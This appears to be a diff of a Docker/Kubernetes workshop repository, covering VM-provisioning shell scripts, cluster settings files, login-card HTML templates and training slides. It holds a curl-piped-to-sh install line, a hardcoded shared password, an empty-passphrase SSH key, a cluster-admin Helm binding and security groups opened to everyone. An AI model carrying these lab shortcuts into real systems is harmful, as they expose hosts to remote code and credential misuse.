# Install kubectx and kubens
@@ -241,21 +183,6 @@ EOF"
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"
# Install ship
pssh "
if [ ! -x /usr/local/bin/ship ]; then
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"
# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
fi"
sep "Done"
}
@@ -276,9 +203,10 @@ _cmd_kubetest() {
# Feel free to make that better ♥
pssh "
set -e
if i_am_first_node; then
[ -f /tmp/node ]
if grep -q node1 /tmp/node; then
which kubectl
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
@@ -349,14 +277,6 @@ _cmd_opensg() {
infra_opensg
}
_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag
infra_disableaddrchecks
}
_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
@@ -391,15 +311,6 @@ _cmd_retag() {
aws_tag_instances $OLDTAG $NEWTAG
}
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}
_cmd start "Start a group of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
@@ -411,7 +322,7 @@ _cmd_start() {
*) die "Unrecognized parameter: $1."
esac
done
if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
@@ -422,8 +333,8 @@ _cmd_start() {
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
fi
# Check that the specified settings and infrastructure are valid.
# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
@@ -495,15 +406,15 @@ _cmd_helmprom() {
TAG=$1
need_tag
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
kubectl -n kube-system get serviceaccount helm ||
kubectl -n kube-system create serviceaccount helm
sudo -u docker -H helm init --service-account helm
helm init --service-account helm
kubectl get clusterrolebinding helm-can-do-everything ||
kubectl create clusterrolebinding helm-can-do-everything \
--clusterrole=cluster-admin \
--serviceaccount=kube-system:helm
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
helm upgrade --install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
@@ -585,8 +496,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
"ls -l /usr/local/bin/i_am_first_node" \
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /tmp/node" \
"cat /tmp/ipv4" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \

View File

@@ -24,7 +24,3 @@ infra_quotas() {
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}
infra_disableaddrchecks() {
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

View File

@@ -88,14 +88,6 @@ infra_opensg() {
--cidr 0.0.0.0/0
}
infra_disableaddrchecks() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
for ID in $IDS; do
info "Disabling source/destination IP checks on: $ID"
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
done
}
wait_until_tag_is_running() {
max_retry=50
i=0

View File

@@ -12,7 +12,6 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]
@@ -122,7 +121,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses
def makenames(addrs):
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -136,21 +135,15 @@ while addresses:
print(cluster)
mynode = cluster.index(ipv4) + 1
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
system("echo node{} | sudo tee /etc/hostname".format(mynode))
system("sudo hostname node{}".format(mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPV4 and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])

View File

@@ -1,8 +1,5 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv

View File

@@ -0,0 +1,25 @@
# Number of VMs per cluster
clustersize: 5
# Jinja2 template to use to generate ready-to-cut cards
cards_template: enix.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.22.0
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,27 @@
# customize your cluster size, your cards template, and the versions
# Number of VMs per cluster
clustersize: 5
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.18.0
machine_version: 0.13.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -3,11 +3,8 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: jerome.html
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter

View File

@@ -1,9 +1,6 @@
# Number of VMs per cluster
clustersize: 4
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: jerome.html
@@ -26,4 +23,3 @@ machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,27 @@
# 3 nodes for k8s 101 workshops
# Number of VMs per cluster
clustersize: 3
# Jinja2 template to use to generate ready-to-cut cards
cards_template: kube101.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.21.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -0,0 +1,27 @@
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
# Number of VMs per cluster
clustersize: 3
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.22.0
machine_version: 0.15.0
# Password used to connect with the "docker user"
docker_user_password: training

View File

@@ -1,53 +0,0 @@
#!/bin/sh
set -e
INFRA=infra/aws-eu-west-3
STUDENTS=2
TAG=admin-dmuc
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $STUDENTS
./workshopctl deploy $TAG
./workshopctl disabledocker $TAG
./workshopctl kubebins $TAG
./workshopctl cards $TAG
TAG=admin-kubenet
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl disableaddrchecks $TAG
./workshopctl cards $TAG
TAG=admin-kuberouter
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kubebins $TAG
./workshopctl disableaddrchecks $TAG
./workshopctl cards $TAG
TAG=admin-test
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$TAG.yaml \
--count $((3*$STUDENTS))
./workshopctl deploy $TAG
./workshopctl kube $TAG 1.13.5
./workshopctl cards $TAG

View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -0,0 +1,117 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://septembre2018.container.training" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 30%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.3em;
}
img.enix {
height: 4.5em;
margin-top: 0.2em;
}
img.kube {
height: 4.2em;
margin-top: 1.7em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Voici les informations permettant de se connecter à votre
cluster pour cette formation. Vous pouvez vous connecter
à ces machines virtuelles avec n'importe quel client SSH.
</p>
<p>
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
<table>
<tr><td>identifiant:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>mot de passe:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Vos serveurs sont :
<img class="kube" src="{{ image_src }}" />
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>Le support de formation est à l'adresse suivante :
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -1,14 +1,15 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://wwrk-2019-05.container.training/" -%}
{%- set url = "http://qconsf2018.container.training/" -%}
{%- set pagesize = 9 -%}
{%- set workshop_name = "training session" -%}
{%- if clustersize == 1 -%}
{%- set cluster_or_machine = "Docker machine" -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set cluster_or_machine = "Kubernetes cluster" -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
@@ -108,6 +109,23 @@ img {
<center>{{ url }}</center>
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% for x in range(pagesize) %}
<div class="back">
<br/>
<p>You got this card at the workshop "Getting Started With Kubernetes and Container Orchestration"
during QCON San Francisco (November 2018).</p>
<p>That workshop was a 1-day version of a longer curriculum.</p>
<p>If you liked that workshop, the instructor (Jérôme Petazzoni) can deliver it
(or the longer version) to your team or organization.</p>
<p>You can reach him at:</p>
<p>jerome.petazzoni@gmail.com</p>
<p>Thank you!</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endfor %}
</body>
</html>

View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

@@ -1,7 +0,0 @@
FROM alpine
RUN apk update
RUN apk add entr
RUN apk add py-pip
RUN apk add git
COPY requirements.txt .
RUN pip install -r requirements.txt

View File

@@ -34,14 +34,6 @@ compile each `foo.yml` file into `foo.yml.html`.
You can also run `./build.sh forever`: it will monitor the current
directory and rebuild slides automatically when files are modified.
If you have problems running `./build.sh` (because of
Python dependencies or whatever),
you can also run `docker-compose up` in this directory.
It will start the `./build.sh forever` script in a container.
It will also start a web server exposing the slides
(but the slides should also work if you load them from your
local filesystem).
## Publishing pipeline
@@ -61,4 +53,4 @@ You can run `./slidechecker foo.yml.html` to check for
missing images and show the number of slides in that deck.
It requires `phantomjs` to be installed. It takes some
time to run so it is not yet integrated with the publishing
pipeline.
pipeline.

View File

@@ -1,5 +1 @@
# Uncomment and/or edit one of the the following lines if necessary.
#/ /kube-halfday.yml.html 200
#/ /kube-fullday.yml.html 200
#/ /kube-twodays.yml.html 200
/ /wwrk.yml.html 200!
/ /kube-twodays.yml.html 200!

View File

@@ -186,48 +186,22 @@ Different deployments will use different underlying technologies.
---
## Some popular service meshes
## Section summary
... And related projects:
We've learned how to:
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
<br/>
Transparently secures service-to-service connections with mTLS.
* Understand the ambassador pattern and what it is used for (service portability).
* [Gloo](https://gloo.solo.io/)
<br/>
API gateway that can interconnect applications on VMs, containers, and serverless.
For more information about the ambassador pattern, including demos on Swarm and ECS:
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
Some services meshes and related projects:
* [Istio](https://istio.io/)
<br/>
A popular service mesh.
* [Linkerd](https://linkerd.io/)
<br/>
Another popular service mesh.
---
## Learning more about service meshes
A few blog posts about service meshes:
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
<br/>
Provides historical context: how did we do before service meshes were invented?
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
<br/>
Explains the purpose of service meshes. Illustrates some NGINX features.
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
<br/>
Includes high-level overview and definitions.
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
<br/>
Includes a step-by-step demo of Linkerd.
And a video:
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
* [Gloo](https://gloo.solo.io/)

View File

@@ -131,12 +131,6 @@ Sending build context to Docker daemon 2.048 kB
* Be careful (or patient) if that directory is big and your link is slow.
* You can speed up the process with a [`.dockerignore`](https://docs.docker.com/engine/reference/builder/#dockerignore-file) file
* It tells docker to ignore specific files in the directory
* Only ignore files that you won't need in the build context!
---
## Executing each step

View File

@@ -528,9 +528,7 @@ Very short instructions:
- `docker network create mynet --driver overlay`
- `docker service create --network mynet myimage`
If you want to learn more about Swarm mode, you can check
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
or [these slides](https://container.training/swarm-selfpaced.yml.html).
See http://jpetazzo.github.io/container.training for all the deets about clustering!
---

View File

@@ -1,5 +0,0 @@
# Exercise — writing a Compose file
Let's write a Compose file for the wordsmith app!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -1,9 +0,0 @@
# Exercise — writing better Dockerfiles
Let's update our Dockerfiles to leverage multi-stage builds!
The code is at: https://github.com/jpetazzo/wordsmith
Use a different tag for these images, so that we can compare their sizes.
What's the size difference between single-stage and multi-stage builds?

View File

@@ -1,5 +0,0 @@
# Exercise — writing Dockerfiles
Let's write Dockerfiles for an existing application!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -203,90 +203,4 @@ bash: figlet: command not found
* The basic Ubuntu image was used, and `figlet` is not here.
---
## Where's my container?
* Can we reuse that container that we took time to customize?
*We can, but that's not the default workflow with Docker.*
* What's the default workflow, then?
*Always start with a fresh container.*
<br/>
*If we need something installed in our container, build a custom image.*
* That seems complicated!
*We'll see that it's actually pretty easy!*
* And what's the point?
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
---
## Pets vs. Cattle
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
* Pets:
* have distinctive names and unique configurations
* when they have an outage, we do everything we can to fix them
* Cattle:
* have generic names (e.g. with numbers) and generic configuration
* configuration is enforced by configuration management, golden images ...
* when they have an outage, we can replace them immediately with a new server
* What's the connection with Docker and containers?
---
## Local development environments
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
* create VM from base template (Ubuntu, CentOS...)
* install packages, set up environment
* work on project
* when done, shutdown VM
* next time we need to work on project, restart VM as we left it
* if we need to tweak the environment, we do it live
* Over time, the VM configuration evolves, diverges.
* We don't have a clean, reliable, deterministic way to provision that environment.
---
## Local development with Docker
* With Docker, the workflow looks like this:
* create container image with our dev environment
* run container with that image
* work on project
* when done, shutdown container
* next time we need to work on project, start a new container
* if we need to tweak the environment, we create a new image
* We have a clear definition of our environment, and can share it reliably with others.
* Let's see in the next chapters how to bake a custom image with `figlet`!
* We will see in the next chapters how to bake a custom image with `figlet`.

View File

@@ -70,9 +70,8 @@ class: pic
* An image is a read-only filesystem.
* A container is an encapsulated set of processes,
running in a read-write copy of that filesystem.
* A container is an encapsulated set of processes running in a
read-write copy of that filesystem.
* To optimize container boot time, *copy-on-write* is used
instead of regular copy.
@@ -178,11 +177,8 @@ Let's explain each of them.
## Root namespace
The root namespace is for official images.
They are gated by Docker Inc.
They are generally authored and maintained by third parties.
The root namespace is for official images. They are put there by Docker Inc.,
but they are generally authored and maintained by third parties.
Those images include:
@@ -192,7 +188,7 @@ Those images include:
* Ready-to-use components and services, like redis, postgresql...
* Over 150 at this point!
* Over 130 at this point!
---

View File

@@ -38,7 +38,11 @@ We can arbitrarily distinguish:
## Installing Docker on Linux
* The recommended method is to install the packages supplied by Docker Inc :
* The recommended method is to install the packages supplied by Docker Inc.:
https://store.docker.com
* The general method is:
- add Docker Inc.'s package repositories to your system configuration
@@ -52,12 +56,6 @@ We can arbitrarily distinguish:
https://docs.docker.com/engine/installation/linux/docker-ce/binaries/
* To quickly setup a dev environment, Docker provides a convenience install script:
```bash
curl -fsSL get.docker.com | sh
```
---
class: extra-details
@@ -84,11 +82,11 @@ class: extra-details
## Installing Docker on macOS and Windows
* On macOS, the recommended method is to use Docker Desktop for Mac:
* On macOS, the recommended method is to use Docker for Mac:
https://docs.docker.com/docker-for-mac/install/
* On Windows 10 Pro, Enterprise, and Education, you can use Docker Desktop for Windows:
* On Windows 10 Pro, Enterprise, and Education, you can use Docker for Windows:
https://docs.docker.com/docker-for-windows/install/
@@ -102,7 +100,7 @@ class: extra-details
---
## Docker Desktop for Mac and Docker Desktop for Windows
## Docker for Mac and Docker for Windows
* Special Docker Editions that integrate well with their respective host OS

View File

@@ -295,4 +295,4 @@ that you don't drop messages on the floor. Good luck.
If you want to learn more about the GELF driver,
have a look at [this blog post](
https://jpetazzo.github.io/2017/01/20/docker-logging-gelf/).
http://jpetazzo.github.io/2017/01/20/docker-logging-gelf/).

View File

@@ -6,6 +6,8 @@ In this chapter, we will:
* Present (from a high-level perspective) some orchestrators.
* Show one orchestrator (Kubernetes) in action.
---
class: pic
@@ -153,7 +155,7 @@ processes or data flows are given access to system resources.*
The scheduler is concerned mainly with:
- throughput (total amount of work done per time unit);
- throughput (total amount or work done per time unit);
- turnaround time (between submission and completion);
- response time (between submission and start);
- waiting time (between job readiness and execution);
@@ -247,7 +249,7 @@ class: pic
.center[![Not-so-good bin packing](images/binpacking-1d-1.gif)]
## We can't fit a job of size 6 :(
## Can we do better?
---
@@ -257,7 +259,7 @@ class: pic
.center[![Better bin packing](images/binpacking-1d-2.gif)]
## ... Now we can!
## Yup!
---
@@ -388,7 +390,7 @@ It depends on:
(Marathon = long running processes; Chronos = run at intervals; ...)
- Commercial offering through DC/OS by Mesosphere.
- Commercial offering through DC/OS my Mesosphere.
---

View File

@@ -19,7 +19,7 @@ class: title
- install Docker on e.g. a cloud VM
- use https://www.play-with-docker.com/ to instantly get a training environment
- use http://www.play-with-docker.com/ to instantly get a training environment
---

View File

@@ -119,7 +119,7 @@ Nano and LinuxKit VMs in Hyper-V!)
- golang, mongo, python, redis, hello-world ... and more being added
- you should still use `--plaform` with multi-os images to be certain
- you should still use `--plaform` with multi-os images to be certain
- Windows Containers now support `localhost` accessible containers (July 2018)
@@ -135,8 +135,8 @@ Most "official" Docker images don't run on Windows yet.
Places to Look:
- Hub Official: https://hub.docker.com/u/winamd64/
- Hub Official: https://hub.docker.com/u/winamd64/
- Microsoft: https://hub.docker.com/r/microsoft/
---
@@ -153,7 +153,7 @@ Places to Look:
- PowerShell [Tab Completion: DockerCompletion](https://github.com/matt9ucci/DockerCompletion)
- Best Shell GUI: [Cmder.net](https://cmder.net/)
- Best Shell GUI: [Cmder.net](http://cmder.net/)
- Good Windows Container Blogs and How-To's

View File

@@ -401,7 +401,7 @@ or providing extra features. For instance:
* [REX-Ray](https://rexray.io/) - create and manage volumes backed by an enterprise storage system (e.g.
SAN or NAS), or by cloud block stores (e.g. EBS, EFS).
* [Portworx](https://portworx.com/) - provides distributed block store for containers.
* [Portworx](http://portworx.com/) - provides distributed block store for containers.
* [Gluster](https://www.gluster.org/) - open source software-defined distributed storage that can scale
to several petabytes. It provides interfaces for object, block and file storage.

View File

@@ -1,16 +0,0 @@
version: "2"
services:
www:
image: nginx
volumes:
- .:/usr/share/nginx/html
ports:
- 80
builder:
build: .
volumes:
- ..:/repo
working_dir: /repo/slides
command: ./build.sh forever

Binary file not shown.

Before

Width:  |  Height:  |  Size: 203 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 81 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 84 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

Width:  |  Height:  |  Size: 82 KiB

File diff suppressed because it is too large Load Diff

Before

